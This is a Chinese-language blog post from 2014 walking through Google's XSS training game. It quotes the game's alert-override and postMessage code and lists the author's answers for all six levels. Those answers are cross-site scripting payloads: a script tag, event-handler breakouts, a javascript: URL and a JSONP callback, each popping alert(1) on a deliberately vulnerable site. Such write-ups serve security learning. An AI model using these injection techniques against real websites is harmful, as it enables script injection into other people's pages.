有意思的遊戲:GoogleXSSGame

橫雲斷嶺發表於2014-05-31

Google最近出了一個XSS的遊戲:

https://xss-game.appspot.com/

我這個菜鳥看提示,花了兩三個小時才全過了。。

這個遊戲的規則是隻要在攻擊網頁上彈出alert視窗就可以了。

題目頁面是在iframe裡巢狀的展現的,那麼父視窗是如何知道iframe裡成功彈出了視窗?

是這樣子實現的:

題目頁面載入了這個js,改寫了alert函式,當alert被呼叫時,向parent傳送一個訊息。

https://xss-game.appspot.com/static/game-frame.js

/* If we`re being iframed, let the parent know our URL */
/* Kids: don`t do this at home! */
parent.postMessage(window.location.toString(), "*");

/* Override window.alert */
var originalAlert = window.alert;
window.alert = function(s) {
  parent.postMessage("success", "*");
  setTimeout(function() { 
    originalAlert("Congratulations, you executed an alert:

" 
      + s + "

You can now advance to the next level.");
  }, 50);
}

然後父視窗註冊了一個EventListener來接收這個訊息:

https://xss-game.appspot.com/static/game.js

window.addEventListener("message", function(event) {

  if (!window.location.origin) {
    window.location.origin = window.location.protocol + "//" 
        + window.location.hostname 
        + (window.location.port ? `:` + window.location.port: ``);
  }

  if (event.origin == window.location.origin && event.data == "success") {
    userOpenedAlert = true;
    levelSolved();
    return;
  }

最下面是題目的答案。如果想自己玩遊戲的,慎拉下。

題目的答案:

Level1:
<script>alert(1)</script>
Level2:
<input onmouseover=”alert(1)”>

Level3:

https://xss-game.appspot.com/level3/frame#3.jpg` onload=”alert(1)”>

Level4:

3`);alert(`1

Level5:

https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)

Level6:

重點是前面要有一個空格。

​ https://www.google.com/jsapi?callback=alert

遊戲過關之後,google給出了一個xss的文件:

https://www.google.com/about/appsecurity/learning/xss/index.html


相關文章